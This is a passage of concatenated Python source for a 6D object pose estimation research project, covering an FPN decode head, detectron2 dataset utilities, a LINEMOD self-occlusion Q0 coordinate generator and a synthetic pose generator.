masked BCE loss, ignore_index should be set to None. Default: 255
sampler (dict|None): The config of segmentation map sampler.
Default: None.
align_corners (bool): align_corners argument of F.interpolate.
Default: False.
"""
def __init__(
self,
in_channels,
channels,
*,
dropout_ratio=0.1,
conv_cfg=None,
norm=None,
act="relu",
in_index=-1,
input_transform=None,
align_corners=False,
):
super(BaseDecodeHead, self).__init__()
self._init_inputs(in_channels, in_index, input_transform)
self.channels = channels
self.dropout_ratio = dropout_ratio
self.conv_cfg = conv_cfg
self.norm = norm
self.act = act
self.in_index = in_index
self.align_corners = align_corners
if dropout_ratio > 0:
self.dropout = nn.Dropout2d(dropout_ratio)
else:
self.dropout = None
self.fp16_enabled = False
def extra_repr(self):
"""Extra repr."""
s = f"input_transform={self.input_transform}, " f"align_corners={self.align_corners}"
return s
def _init_inputs(self, in_channels, in_index, input_transform):
"""Check and initialize input transforms.
The in_channels, in_index and input_transform must match.
Specifically, when input_transform is None, only a single feature map
will be selected, so in_channels and in_index must be of type int.
When input_transform is not None, in_channels and in_index must be
sequences of the same length.
Args:
in_channels (int|Sequence[int]): Input channels.
in_index (int|Sequence[int]): Input feature index.
input_transform (str|None): Transformation type of input features.
Options: 'resize_concat', 'multiple_select', None.
'resize_concat': Multiple feature maps will be resized to the
same size as the first one and then concatenated together.
Usually used in FCN head of HRNet.
'multiple_select': Multiple feature maps will be bundled into
a list and passed into the decode head.
None: Only one select feature map is allowed.
"""
if input_transform is not None:
assert input_transform in ["resize_concat", "multiple_select"]
self.input_transform = input_transform
self.in_index = in_index
if input_transform is not None:
assert isinstance(in_channels, (list, tuple))
assert isinstance(in_index, (list, tuple))
assert len(in_channels) == len(in_index)
if input_transform == "resize_concat":
self.in_channels = sum(in_channels)
else:
self.in_channels = in_channels
else:
assert isinstance(in_channels, int)
assert isinstance(in_index, int)
self.in_channels = in_channels
def _transform_inputs(self, inputs):
"""Transform inputs for decoder.
Args:
inputs (list[Tensor]): List of multi-level img features.
Returns:
Tensor: The transformed inputs
"""
if self.input_transform == "resize_concat":
inputs = [inputs[i] for i in self.in_index]
upsampled_inputs = [
resize(input=x, size=inputs[0].shape[2:], mode="bilinear", align_corners=self.align_corners)
for x in inputs
]
inputs = torch.cat(upsampled_inputs, dim=1)
elif self.input_transform == "multiple_select":
inputs = [inputs[i] for i in self.in_index]
else:
inputs = inputs[self.in_index]
return inputs
class FPNMaskXyzRegionHead(BaseDecodeHead):
"""Panoptic Feature Pyramid Networks. This head is the implementation of
`Semantic FPN.
<https://arxiv.org/abs/1901.02446>`_.
Args:
feature_strides (tuple[int]): The strides for input feature maps.
stack_lateral. All strides suppose to be power of 2. The first
one is of largest resolution.
"""
def __init__(
self,
feature_strides,
out_kernel_size=1,
out_layer_shared=True,
mask_num_classes=1,
xyz_num_classes=1,
region_num_classes=1,
mask_out_dim=1,
xyz_out_dim=3,
region_out_dim=65, # 64+1,
**kwargs,
):
super().__init__(input_transform="multiple_select", **kwargs)
assert len(feature_strides) == len(self.in_channels)
assert min(feature_strides) == feature_strides[0]
self.feature_strides = feature_strides
self.scale_heads = nn.ModuleList()
for i in range(len(feature_strides)):
head_length = max(1, int(np.log2(feature_strides[i]) - np.log2(feature_strides[0])))
scale_head = []
for k in range(head_length):
scale_head.append(
ConvModule(
self.in_channels[i] if k == 0 else self.channels,
self.channels,
3,
padding=1,
conv_cfg=self.conv_cfg,
norm=self.norm,
act=self.act,
)
)
if feature_strides[i] != feature_strides[0]:
scale_head.append(nn.Upsample(scale_factor=2, mode="bilinear", align_corners=self.align_corners))
self.scale_heads.append(nn.Sequential(*scale_head))
self.out_layer_shared = out_layer_shared
self.mask_num_classes = mask_num_classes
self.xyz_num_classes = xyz_num_classes
self.region_num_classes = region_num_classes
self.mask_out_dim = mask_out_dim
self.xyz_out_dim = xyz_out_dim
self.region_out_dim = region_out_dim
_in_dim = self.channels
if self.out_layer_shared:
out_dim = (
self.mask_out_dim * self.mask_num_classes
+ self.xyz_out_dim * self.xyz_num_classes
+ self.region_out_dim * self.region_num_classes
)
self.out_layer = nn.Conv2d(
_in_dim,
out_dim,
kernel_size=out_kernel_size,
padding=(out_kernel_size - 1) // 2,
bias=True,
)
else:
self.mask_out_layer = nn.Conv2d(
_in_dim,
self.mask_out_dim * self.mask_num_classes,
kernel_size=out_kernel_size,
padding=(out_kernel_size - 1) // 2,
bias=True,
)
self.xyz_out_layer = nn.Conv2d(
_in_dim,
self.xyz_out_dim * self.xyz_num_classes,
kernel_size=out_kernel_size,
padding=(out_kernel_size - 1) // 2,
bias=True,
)
self.region_out_layer = nn.Conv2d(
_in_dim,
self.region_out_dim * self.region_num_classes,
kernel_size=out_kernel_size,
padding=(out_kernel_size - 1) // 2,
bias=True,
)
# init
for m in self.modules():
if isinstance(m, nn.Conv2d):
normal_init(m, std=0.001)
elif isinstance(m, (_BatchNorm, nn.GroupNorm)):
constant_init(m, 1)
elif isinstance(m, nn.ConvTranspose2d):
normal_init(m, std=0.001)
# init output layers
if self.out_layer_shared:
normal_init(self.out_layer, std=0.01)
else:
normal_init(self.mask_out_layer, std=0.01)
normal_init(self.xyz_out_layer, std=0.01)
normal_init(self.region_out_layer, std=0.01)
def forward(self, inputs):
x = self._transform_inputs(inputs) # strides: [4, 8, 16, 32]
output = self.scale_heads[0](x[0])
for i in range(1, len(self.feature_strides)):
# non inplace
output = output + resize(
self.scale_heads[i](x[i]), size=output.shape[2:], mode="bilinear", align_corners=self.align_corners
)
output = self.get_output(output)
return output
def get_output(self, x):
if self.dropout is not None:
x = self.dropout(x)
if self.out_layer_shared:
out = self.out_layer(x)
mask_dim = self.mask_out_dim * self.mask_num_classes
mask = out[:, :mask_dim, :, :]
xyz_dim = self.xyz_out_dim * self.xyz_num_classes
xyz = out[:, mask_dim : mask_dim + xyz_dim, :, :]
region = out[:, mask_dim + xyz_dim :, :, :]
bs, c, h, w = xyz.shape
xyz = xyz.view(bs, 3, xyz_dim // 3, h, w)
coor_x = xyz[:, 0, :, :, :]
coor_y = xyz[:, 1, :, :, :]
coor_z = xyz[:, 2, :, :, :]
else:
mask = self.mask_out_layer(x)
xyz = self.xyz_out_layer(x)
bs, c, h, w = xyz.shape
xyz = xyz.view(bs, 3, c // 3, h, w)
coor_x = xyz[:, 0, :, :, :]
coor_y = xyz[:, 1, :, :, :]
coor_z = xyz[:, 2, :, :, :]
region = self.region_out_layer(x)
return mask, coor_x, coor_y, coor_z, region
```
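When `out_layer_shared` is enabled, a single convolution produces all outputs at once and `get_output` simply slices the channel dimension. A small sketch of that slicing with made-up sizes (one class per output, matching the defaults above):

```python
import torch

mask_dim, xyz_dim, region_dim = 1, 3, 65      # mask_out_dim, xyz_out_dim, region_out_dim defaults
out = torch.randn(2, mask_dim + xyz_dim + region_dim, 64, 64)

mask = out[:, :mask_dim, :, :]                      # (B, 1, H, W)
xyz = out[:, mask_dim:mask_dim + xyz_dim, :, :]     # (B, 3, H, W)
region = out[:, mask_dim + xyz_dim:, :, :]          # (B, 65, H, W)

bs, c, h, w = xyz.shape
xyz = xyz.view(bs, 3, c // 3, h, w)                 # one sub-block per x/y/z coordinate
coor_x, coor_y, coor_z = xyz[:, 0], xyz[:, 1], xyz[:, 2]
assert mask.shape[1] == 1 and region.shape[1] == 65
```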
#### File: gdrn_selfocc_modeling/tools/dataset_utils.py
```python
import copy
import logging
import numpy as np
import operator
import pickle
import random
import mmcv
import torch
import torch.multiprocessing as mp
import torch.utils.data as data
from torch.utils.data import dataloader
from detectron2.utils.serialize import PicklableWrapper
from detectron2.data.build import worker_init_reset_seed, get_detection_dataset_dicts
from detectron2.data.common import AspectRatioGroupedDataset, DatasetFromList, MapDataset
from detectron2.data.dataset_mapper import DatasetMapper
from detectron2.data.samplers import InferenceSampler, RepeatFactorTrainingSampler, TrainingSampler
from detectron2.data import DatasetCatalog, MetadataCatalog
from detectron2.structures import BoxMode
import ref
from . import my_comm as comm
logger = logging.getLogger(__name__)
def flat_dataset_dicts(dataset_dicts):
"""
Flatten dataset dicts in detectron2 format.
original: a list of dicts, each containing image-level info
and an "annotations" field with instance-level info for multiple instances
=> flatten the instance-level annotations
flat format:
a list of dicts, one per instance;
each dict includes the image-level info,
an `inst_id` identifying the single instance,
and `inst_infos` containing only that instance's annotation
"""
new_dicts = []
for dataset_dict in dataset_dicts:
img_infos = {_k: _v for _k, _v in dataset_dict.items() if _k not in ["annotations"]}
if "annotations" in dataset_dict:
for inst_id, anno in enumerate(dataset_dict["annotations"]):
rec = {"inst_id": inst_id, "inst_infos": anno}
rec.update(img_infos)
new_dicts.append(rec)
else:
rec = img_infos
new_dicts.append(rec)
return new_dicts
def filter_invalid_in_dataset_dicts(dataset_dicts, visib_thr=0.0):
"""
Filter invalid instances in the dataset_dicts (for training).
Args:
visib_thr: minimum visible fraction; instances with visib_fract <= visib_thr are dropped.
"""
num_filtered = 0
new_dicts = []
for dataset_dict in dataset_dicts:
new_dict = {_k: _v for _k, _v in dataset_dict.items() if _k not in ["annotations"]}
if "annotations" in dataset_dict:
new_annos = []
for inst_id, anno in enumerate(dataset_dict["annotations"]):
if anno.get("visib_fract", 1.0) > visib_thr:
new_annos.append(anno)
else:
num_filtered += 1
if len(new_annos) == 0:
continue
new_dict["annotations"] = new_annos
new_dicts.append(new_dict)
if num_filtered > 0:
logger.warning(f"filtered out {num_filtered} instances with visib_fract <= {visib_thr}")
return new_dicts
def trivial_batch_collator(batch):
"""A batch collator that does nothing.
https://github.com/pytorch/fairseq/issues/1171
"""
dataloader._use_shared_memory = False
return batch
def filter_empty_dets(dataset_dicts):
"""
Filter out images with empty detections
NOTE: here we assume detections are in "annotations"
Args:
dataset_dicts (list[dict]): annotations in Detectron2 Dataset format.
Returns:
list[dict]: the same format, but filtered.
"""
num_before = len(dataset_dicts)
def valid(anns):
if len(anns) > 0:
return True
# for ann in anns:
# if ann.get("iscrowd", 0) == 0:
# return True
return False
dataset_dicts = [x for x in dataset_dicts if valid(x["annotations"])]
num_after = len(dataset_dicts)
if num_after < num_before:
logger = logging.getLogger(__name__)
logger.warning(
"Removed {} images with empty detections. {} images left.".format(num_before - num_after, num_after)
)
return dataset_dicts
def load_detections_into_dataset(
dataset_name,
dataset_dicts,
det_file,
top_k_per_obj=1,
score_thr=0.0,
train_objs=None,
top_k_per_im=None,
):
"""Load test detections into the dataset.
Args:
dataset_name (str):
dataset_dicts (list[dict]): annotations in Detectron2 Dataset format.
det_file (str): file path of pre-computed detections, in json format.
Returns:
list[dict]: the same format as dataset_dicts, but added proposal field.
"""
logger.info("Loading detections for {} from: {}".format(dataset_name, det_file))
detections = mmcv.load(det_file)
meta = MetadataCatalog.get(dataset_name)
objs = meta.objs
ref_key = meta.ref_key
data_ref = ref.__dict__[ref_key]
models_info = data_ref.get_models_info()
if "annotations" in dataset_dicts[0]:
logger.warning("pop the original annotations, load detections")
new_dataset_dicts = []
for i, record_ori in enumerate(dataset_dicts):
record = copy.deepcopy(record_ori)
scene_im_id = record["scene_im_id"]
if scene_im_id not in detections: # not detected
logger.warning(f"no detections found in {scene_im_id}")
continue
dets_i = detections[scene_im_id]
annotations = []
obj_annotations = {obj: [] for obj in objs}
for det in dets_i:
obj_id = det["obj_id"]
bbox_est = det["bbox_est"] # xywh
time = det.get("time", 0.0)
score = det.get("score", 1.0)
if score < score_thr:
continue
obj_name = data_ref.id2obj[obj_id]
if obj_name not in objs: # detected obj is not interested
continue
if train_objs is not None: # not in trained objects
if obj_name not in train_objs:
continue
label = objs.index(obj_name)
inst = {
"category_id": label,
"bbox_est": bbox_est,
"bbox_mode": BoxMode.XYWH_ABS,
"score": score,
"time": time,
"model_info": models_info[str(obj_id)], # TODO: maybe just load this in the main function
}
obj_annotations[obj_name].append(inst)
for obj, cur_annos in obj_annotations.items():
scores = [ann["score"] for ann in cur_annos]
sel_annos = [ann for _, ann in sorted(zip(scores, cur_annos), key=lambda pair: pair[0], reverse=True)][
:top_k_per_obj
]
annotations.extend(sel_annos)
# NOTE: maybe [], no detections
record["annotations"] = annotations
new_dataset_dicts.append(record)
if len(new_dataset_dicts) < len(dataset_dicts):
logger.warning(
"No detections found in {} images. original: {} imgs, left: {} imgs".format(
len(dataset_dicts) - len(new_dataset_dicts), len(dataset_dicts), len(new_dataset_dicts)
)
)
return new_dataset_dicts
def load_init_poses_into_dataset(
dataset_name,
dataset_dicts,
init_pose_file,
top_k_per_obj=1,
score_thr=0.0,
train_objs=None,
top_k_per_im=None,
):
"""Load initial poses into the dataset.
Args:
dataset_name (str):
dataset_dicts (list[dict]): annotations in Detectron2 Dataset format.
init_pose_file (str): file path of pre-computed initial poses, in json format.
Returns:
list[dict]: the same format as dataset_dicts, but added proposal field.
"""
logger.info("Loading initial poses for {} from: {}".format(dataset_name, init_pose_file))
init_det_poses = mmcv.load(init_pose_file)
meta = MetadataCatalog.get(dataset_name)
objs = meta.objs
ref_key = meta.ref_key
data_ref = ref.__dict__[ref_key]
models_info = data_ref.get_models_info()
if "annotations" in dataset_dicts[0]:
logger.warning("pop the original annotations, load initial poses")
for record in dataset_dicts:
scene_im_id = record["scene_im_id"]
dets_i = init_det_poses[scene_im_id]
annotations = []
obj_annotations = {obj: [] for obj in objs}
for det in dets_i:
obj_id = det["obj_id"]
# NOTE: need to prepare init poses into this format
pose_est = np.array(det["pose_est"], dtype=np.float32).reshape(3, 4)
bbox_est = det.get("bbox_est", None) # xywh or None
time = det.get("time", 0.0)
score = det.get("score", 1.0)
if score < score_thr:
continue
obj_name = data_ref.id2obj[obj_id]
if obj_name not in objs: # detected obj is not interested
continue
if train_objs is not None: # not in trained objects
if obj_name not in train_objs:
continue
label = objs.index(obj_name)
inst = {
"category_id": label,
"pose_est": pose_est,
"score": score,
"time": time,
"model_info": models_info[str(obj_id)], # TODO: maybe just load this in the main function
}
if bbox_est is not None: # if None, compute bboxes from poses and 3D points later
inst["bbox_est"] = bbox_est
inst["bbox_mode"] = BoxMode.XYWH_ABS
obj_annotations[obj_name].append(inst)
for obj, cur_annos in obj_annotations.items():
scores = [ann["score"] for ann in cur_annos]
sel_annos = [ann for _, ann in sorted(zip(scores, cur_annos), key=lambda pair: pair[0], reverse=True)][
:top_k_per_obj
]
annotations.extend(sel_annos)
# NOTE: maybe [], no initial poses
record["annotations"] = annotations
return dataset_dicts
def my_build_batch_data_loader(dataset, sampler, total_batch_size, *, aspect_ratio_grouping=False, num_workers=0):
"""Build a batched dataloader for training.
Args:
dataset (torch.utils.data.Dataset): map-style PyTorch dataset. Can be indexed.
sampler (torch.utils.data.sampler.Sampler): a sampler that produces indices
total_batch_size, aspect_ratio_grouping, num_workers: see
:func:`build_detection_train_loader`.
Returns:
iterable[list]. Length of each list is the batch size of the current
GPU. Each element in the list comes from the dataset.
"""
world_size = comm.get_world_size()
assert (
total_batch_size > 0 and total_batch_size % world_size == 0
), "Total batch size ({}) must be divisible by the number of gpus ({}).".format(total_batch_size, world_size)
batch_size = total_batch_size // world_size
# Horovod: limit # of CPU threads to be used per worker.
if num_workers > 0:
torch.set_num_threads(num_workers)
kwargs = {"num_workers": num_workers}
# When supported, use 'forkserver' to spawn dataloader workers instead of 'fork' to prevent
# issues with Infiniband implementations that are not fork-safe
# https://github.com/horovod/horovod/blob/master/examples/pytorch/pytorch_imagenet_resnet50.py
# if (num_workers > 0 and hasattr(mp, '_supports_context') and
# mp._supports_context and 'forkserver' in mp.get_all_start_methods()):
# kwargs['multiprocessing_context'] = 'forkserver'
if aspect_ratio_grouping:
data_loader = torch.utils.data.DataLoader(
dataset,
sampler=sampler,
batch_sampler=None,
collate_fn=operator.itemgetter(0), # don't batch, but yield individual elements
worker_init_fn=worker_init_reset_seed,
#pin_memory=True,
**kwargs,
) # yield individual mapped dict
return AspectRatioGroupedDataset(data_loader, batch_size)
else:
batch_sampler = torch.utils.data.sampler.BatchSampler(
sampler, batch_size, drop_last=True
) # drop_last so the batch always have the same size
return torch.utils.data.DataLoader(
dataset,
batch_sampler=batch_sampler,
collate_fn=trivial_batch_collator,
worker_init_fn=worker_init_reset_seed,
#pin_memory=True,
**kwargs,
)
```
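For reference, here is a tiny example of what the `flat_dataset_dicts` helper defined above returns: image-level fields are copied into one record per instance. The data below is a toy dict, not a real dataset entry.

```python
dataset_dicts = [
    {"file_name": "000001.png", "scene_im_id": "1/0",
     "annotations": [{"category_id": 0}, {"category_id": 3}]},
]
flat = flat_dataset_dicts(dataset_dicts)
# -> two records, each carrying inst_id, inst_infos and the copied image-level keys
assert len(flat) == 2
assert flat[1]["inst_id"] == 1 and flat[1]["inst_infos"]["category_id"] == 3
assert flat[0]["file_name"] == "000001.png"
```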
#### File: gdrn_selfocc_modeling/tools/generate_Q0.py
```python
import sys
sys.path.append('../')
import numpy as np
from PIL import Image, ImageFile
import os
import matplotlib.image as mp
from plyfile import PlyData
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import mmcv
import ref
# Read in the mask information
def read_mask_np(mask_pth):  # read the mask file and convert it to a 0/1 integer array
mask = Image.open(mask_pth).convert('1')
mask_seg = np.array(mask).astype(np.int32)
return mask_seg
# The object's bounding-box info is needed; it lives in models_info.json
def read_rec(model_info_path, obj_name):
id = ref.lm_full.obj2id[obj_name]
id = str(id)
model_info = mmcv.load(model_info_path)
diameter = model_info[id]["diameter"]
x_min, x_size = model_info[id]["min_x"], model_info[id]["size_x"]
y_min, y_size = model_info[id]["min_y"], model_info[id]["size_y"]
z_min, z_size = model_info[id]["min_z"], model_info[id]["size_z"]
return diameter, x_min, x_size, y_min, y_size, z_min, z_size
# Load all the pose info at once; objects are processed one at a time
def read_pose_np(pose_path):  # read the corresponding poses
pose_info = mmcv.load(pose_path)
return pose_info
def transformer(P0, R, t):  # compute P = R @ P0 + t
P0 = np.reshape(P0, [3, 1])
P = np.matmul(R, P0) + t
return P
def transformer_back(P, R, t):  # compute P0 = R^T @ P - R^T @ t
P0 = np.matmul(R.T, P) - np.matmul(R.T, t)
return P0
def projector(P0, K, R, t):  # camera projection: transform P0 by R, t, then project it onto the image
p = np.matmul(K, P0) / P0[2]
p = p[0:2, :] / p[2]
return p
def pointintriangle(A, B, C, P):  # test whether point P lies inside the triangle face with vertices A, B, C
P = np.expand_dims(P, 1)
v0 = C - A
v1 = B - A
v2 = P - A
dot00 = np.matmul(v0.T, v0)
dot01 = np.matmul(v0.T, v1)
dot02 = np.matmul(v0.T, v2)
dot11 = np.matmul(v1.T, v1)
dot12 = np.matmul(v1.T, v2)
inverdeno = 1 / (dot00 * dot11 - dot01 * dot01)
u = (dot11 * dot02 - dot01 * dot12) * inverdeno
if u < 0 or u > 1:
return False
v = (dot00 * dot12 - dot01 * dot02) * inverdeno
if v < 0 or v > 1:
return False
return u + v <= 1
def test_in_box(point, xmin, xmax, ymin, ymax, zmin, zmax, R, t):
# first transform the point back into the object frame
point = np.matmul(R.T, point) - np.matmul(R.T, t)
# print(point)
if xmin < point[0] < xmax and ymin < point[1] < ymax and zmin < point[2] < zmax:
return 1, point
else:
return 0, 0
intrinsic_matrix = {
'linemod': np.array([[572.4114, 0., 325.2611],
[0., 573.57043, 242.04899],
[0., 0., 1.]]),
'blender': np.array([[700., 0., 320.],
[0., 700., 240.],
[0., 0., 1.]]),
'pascal': np.asarray([[-3000.0, 0.0, 0.0],
[0.0, 3000.0, 0.0],
[0.0, 0.0, 1.0]])
}
def estimate_occ_mask_Q0(rootdir, cls_name, scale=1000):  # cls_name is the object name
# create basic path if not exist
id = ref.lm_full.obj2id[cls_name]  # numeric id of the object
basic_path = os.path.join(rootdir, "test/Q0/{:06d}".format(id))
if not os.path.exists(basic_path):
os.makedirs(basic_path)
img_dir = os.path.join(rootdir, "test", "{:06d}".format(id), "rgb")
img_num = len(os.listdir(img_dir))  # number of images
model_info_path = os.path.join(rootdir, "models/models_info.json")
diameter, xmin, x_size, ymin, y_size, zmin, z_size = read_rec(model_info_path, cls_name)
xmax = xmin + x_size
ymax = ymin + y_size
zmax = zmin + z_size
xmin = xmin / scale
xmax = xmax / scale
ymin = ymin / scale
ymax = ymax / scale
zmin = zmin / scale
zmax = zmax / scale
pose_path = os.path.join(rootdir, "test/{:06d}".format(id), "scene_gt.json")
pose_info = read_pose_np(pose_path)
for k in range(img_num):
print(cls_name, k)
mask_path = os.path.join(rootdir, "test/{:06d}".format(id), "mask_visib", '{:06d}_000000.png'.format(k))
mask = read_mask_np(mask_path)
R, t = pose_info[str(k)][0]["cam_R_m2c"], pose_info[str(k)][0]["cam_t_m2c"]
R = np.array(R)
R = np.reshape(R, (3, 3))  # reshape into a 3x3 matrix
t = np.reshape(np.array(t), (3, 1)) / scale
# crop out the object's four bounding-box coordinates (xyxy)
xyz_info = os.path.join(rootdir, "test/xyz_crop/{:06d}".format(id), "{:06d}_000000.pkl".format(k))
xyz = mmcv.load(xyz_info)
x1, y1, x2, y2 = xyz["xyxy"]
camK = intrinsic_matrix['linemod'].copy()
camK_inv = np.linalg.inv(camK)
# start computing the occlusion relations
# loop over every pixel
height, width = mask.shape
# storage for the occlusion masks
occ_mask_x = np.zeros((height, width))
occ_mask_y = np.zeros((height, width))
occ_mask_z = np.zeros((height, width))
# storage for the Q0 coordinates
Q0_x = np.zeros((3, height, width))
Q0_y = np.zeros((3, height, width))
Q0_z = np.zeros((3, height, width))
n_x = np.array([[1], [0], [0]]) # Q0_yz
n_y = np.array([[0], [1], [0]]) # Q0_xz
n_z = np.array([[0], [0], [1]]) # Q0_xy
# precompute some required quantities
RnxTt = np.matmul(np.matmul(R, n_x).T, t)
RnyTt = np.matmul(np.matmul(R, n_y).T, t)
RnzTt = np.matmul(np.matmul(R, n_z).T, t)
for i in range(height):
for j in range(width):
point = np.array([[j], [i], [1]])
if mask[i][j] < 1:
continue
else:
Q0_x_v = (RnxTt / np.matmul(np.matmul(R, n_x).T,
np.matmul(camK_inv, point))) * np.matmul(camK_inv, point)
occ_mask_x[i][j], Q_save = test_in_box(Q0_x_v, xmin, xmax, ymin, ymax, zmin, zmax, R, t)
if occ_mask_x[i][j] > 0:
Q0_x[:, i, j] = Q_save.squeeze()
Q0_y_v = (RnyTt / np.matmul(np.matmul(R, n_y).T,
np.matmul(camK_inv, point))) * np.matmul(camK_inv, point)
occ_mask_y[i][j], Q_save = test_in_box(Q0_y_v, xmin, xmax, ymin, ymax, zmin, zmax, R, t)
if occ_mask_y[i][j] > 0:
Q0_y[:, i, j] = Q_save.squeeze()
Q0_z_v = (RnzTt / np.matmul(np.matmul(R, n_z).T,
np.matmul(camK_inv, point))) * np.matmul(camK_inv, point)
occ_mask_z[i][j], Q_save = test_in_box(Q0_z_v, xmin, xmax, ymin, ymax, zmin, zmax, R, t)
if occ_mask_z[i][j] > 0:
Q0_z[:, i, j] = Q_save.squeeze()
# generate the Q0 coordinates
# get Q0
# show the result
'''
pic_point = Q0_z[:, occ_mask_z.astype(np.bool)]
pic_point = pic_point.T
plt.figure("3D scatter", facecolor="lightgray")
ax3d = plt.gca(projection="3d")
x = pic_point[:, 0]
y = pic_point[:, 1]
z = pic_point[:, 2]
ax3d.scatter(x, y, z, s=20, marker=".", cmap='spectral')
ax3d.set_xlabel("x label")
ax3d.set_ylabel("y_label")
ax3d.set_zlabel("z_label")
plt.show()
'''
Q0 = np.concatenate((Q0_x[1:, :, :], Q0_y[0:1, :, :], Q0_y[2:, :, :], Q0_z[:2, :, :]), axis=0)
# CHW - HWC
Q0 = Q0.transpose((1, 2, 0))
Q0 = {
"occ_crop": Q0[y1:y2 + 1, x1:x2 + 1, :],
"xyxy": [x1, y1, x2, y2],
}
# save the Q0 coordinates
outpath = os.path.join(rootdir, "test/Q0/{:06d}".format(id), '{:06d}_000000.pkl'.format(k))
mmcv.dump(Q0, outpath)
def run_lm_q0():
root_dir = "/data/wanggu/Storage/BOP_DATASETS/lm"
obj_name = [
"ape",
"benchvise",
"bowl",
"camera",
"can",
"cat",
"cup",
"driller",
"duck",
"eggbox",
"glue",
"holepuncher",
"iron",
"lamp",
"phone"] # 15个分别处理
for cls_name in obj_name:
estimate_occ_mask_Q0(root_dir, cls_name)
if __name__ == "__main__":
root_dir = "/data/wanggu/Storage/BOP_DATASETS/lm"
obj_name = [
"ape",
"benchvise",
"bowl",
"camera",
"can",
"cat",
"cup",
"driller",
"duck",
"eggbox",
"glue",
"holepuncher",
"iron",
"lamp",
"phone"] # 15个分别处理
for cls_name in obj_name:
estimate_occ_mask_Q0(root_dir, cls_name)
```
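The per-pixel expressions above intersect the camera ray through each pixel with one of the object's coordinate planes after it has been moved by (R, t), i.e. Q = ((R n)^T t / ((R n)^T K^{-1} p)) * K^{-1} p. Below is a small numeric self-check of that identity; all values are made up purely for the check and are not taken from the dataset.

```python
import numpy as np

K = np.array([[572.4114, 0., 325.2611],
              [0., 573.57043, 242.04899],
              [0., 0., 1.]])
R = np.eye(3)
t = np.array([[0.05], [0.02], [0.9]])
n = np.array([[0.], [0.], [1.]])         # the plane z0 = 0 in the object frame

P0 = np.array([[0.03], [-0.01], [0.0]])  # a point lying on that plane
P_cam = R @ P0 + t                       # its camera-frame position
p = K @ P_cam / P_cam[2]                 # homogeneous pixel coordinates

ray = np.linalg.inv(K) @ p               # back-projected ray through the pixel
Q = ((R @ n).T @ t) / ((R @ n).T @ ray) * ray
assert np.allclose(Q, P_cam)             # the intersection recovers the 3D point
```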
#### File: gdrn_selfocc_modeling/tools/my_setup.py
```python
import logging
def setup_for_distributed(is_master):
"""This function disables printing when not in master process."""
import builtins as __builtin__
builtin_print = __builtin__.print
if not is_master:
logging.getLogger("core").setLevel("WARN")
logging.getLogger("d2").setLevel("WARN")
logging.getLogger("lib").setLevel("WARN")
logging.getLogger("my").setLevel("WARN")
def print(*args, **kwargs):
force = kwargs.pop("force", False)
if is_master or force:
builtin_print(*args, **kwargs)
__builtin__.print = print
```
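A short usage sketch of `setup_for_distributed`, assuming the usual launcher-provided environment variables (reading RANK directly here is just for illustration):

```python
import os

rank = int(os.environ.get("RANK", 0))
setup_for_distributed(is_master=(rank == 0))

print("visible on rank 0 only")             # silently dropped on non-master ranks
print("visible on every rank", force=True)  # the injected `force` kwarg bypasses the filter
```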
#### File: tools/sphere_synt/sphere_synt_2_gen_pose.py
```python
import os.path as osp
import sys
from tqdm import tqdm
import math
import numpy as np
import random
import mmcv
cur_dir = osp.dirname(osp.abspath(__file__))
sys.path.insert(0, osp.join(cur_dir, "../../../../"))
from lib.pysixd import inout, misc, transform
import ref
from lib.utils.utils import dprint
random.seed(2333)
np.random.seed(2333)
if len(sys.argv) > 1:
split = sys.argv[1]
else:
raise RuntimeError("Usage: python this_file.py <split>(train/test)")
print("split: ", split)
ref_key = "sphere_synt"
data_ref = ref.__dict__[ref_key]
model_dir = data_ref.model_dir
id2obj = data_ref.id2obj
K = data_ref.camera_matrix
height = 480
width = 640
# parameters
scene = 1
# N_grid = 200
if split == "train":
seed = 2333
scene_dir = osp.join(data_ref.train_dir, f"{scene:06d}")
N_sample = 20000
# minNoiseSigma = 0
# maxNoiseSigma = 15
# minOutlier = 0
# maxOutlier = 0.3
else:
seed = 123
scene_dir = osp.join(data_ref.test_dir, f"{scene:06d}")
N_sample = 2000
print("random seed: ", seed)
random.seed(seed)
np.random.seed(seed)
mmcv.mkdir_or_exist(scene_dir)
trans_min = [-2, -2, 4]
trans_max = [2, 2, 8]
def my_rand(a, b):
return a + (b - a) * random.random()
def random_rotation():
range = 1
# use eular formulation, three different rotation angles on 3 axis
phi = my_rand(0, range * math.pi * 2)
theta = my_rand(0, range * math.pi)
psi = my_rand(0, range * math.pi * 2)
R0 = []
R0.append(math.cos(psi) * math.cos(phi) - math.cos(theta) * math.sin(phi) * math.sin(psi))
R0.append(math.cos(psi) * math.sin(phi) + math.cos(theta) * math.cos(phi) * math.sin(psi))
R0.append(math.sin(psi) * math.sin(theta))
R1 = []
R1.append(-math.sin(psi) * math.cos(phi) - math.cos(theta) * math.sin(phi) * math.cos(psi))
R1.append(-math.sin(psi) * math.sin(phi) + math.cos(theta) * math.cos(phi) * math.cos(psi))
R1.append(math.cos(psi) * math.sin(theta))
R2 = []
R2.append(math.sin(theta) * math.sin(phi))
R2.append(-math.sin(theta) * math.cos(phi))
R2.append(math.cos(theta))
R = []
R.append(R0)
R.append(R1)
R.append(R2)
return np.array(R)
def main():
vertex_scale = data_ref.vertex_scale
obj_id = 1
model_path = osp.join(model_dir, f"obj_{obj_id:06d}.ply")
# load the model to calculate bbox
model = inout.load_ply(model_path, vertex_scale=vertex_scale)
scene_gt_file = osp.join(scene_dir, "scene_gt.json")
scene_gt_info_file = osp.join(scene_dir, "scene_gt_info.json")
scene_gt_dict = {}
scene_gt_info_dict = {}
i = 0
progress_bar = mmcv.ProgressBar(N_sample)
while True:
# select grids randomly within the image plane
# sy = np.random.randint(height, size=N_grid)
# sx = np.random.randint(width, size=N_grid)
# rotation = transform.random_rotation_matrix()[:3, :3]
rotation = random_rotation()
tx = my_rand(trans_min[0], trans_max[0])
ty = my_rand(trans_min[1], trans_max[1])
tz = my_rand(trans_min[2], trans_max[2])
trans = np.array([tx, ty, tz]).reshape(-1)
pose = np.hstack([rotation, trans.reshape(3, 1)])
proj = (K @ trans.T).T
proj = proj[:2] / proj[2] # ox, oy
if proj[0] < 48 or width - proj[0] < 48 or proj[1] < 48 or height - proj[1] < 48:
dprint(f"skip invalid pose, too close to border, projected center: {proj}")
continue
bbox = misc.compute_2d_bbox_xywh_from_pose(model["pts"], pose, K, width=640, height=480, clip=True).tolist()
x, y, w, h = bbox
if w < 10 or h < 10:
dprint(f"skip invalid pose, w: {w}, h: {h}")
continue
inst = {
"cam_R_m2c": rotation.flatten().tolist(),
"cam_t_m2c": (1000 * trans).flatten().tolist(), # m to mm
"obj_id": obj_id,
}
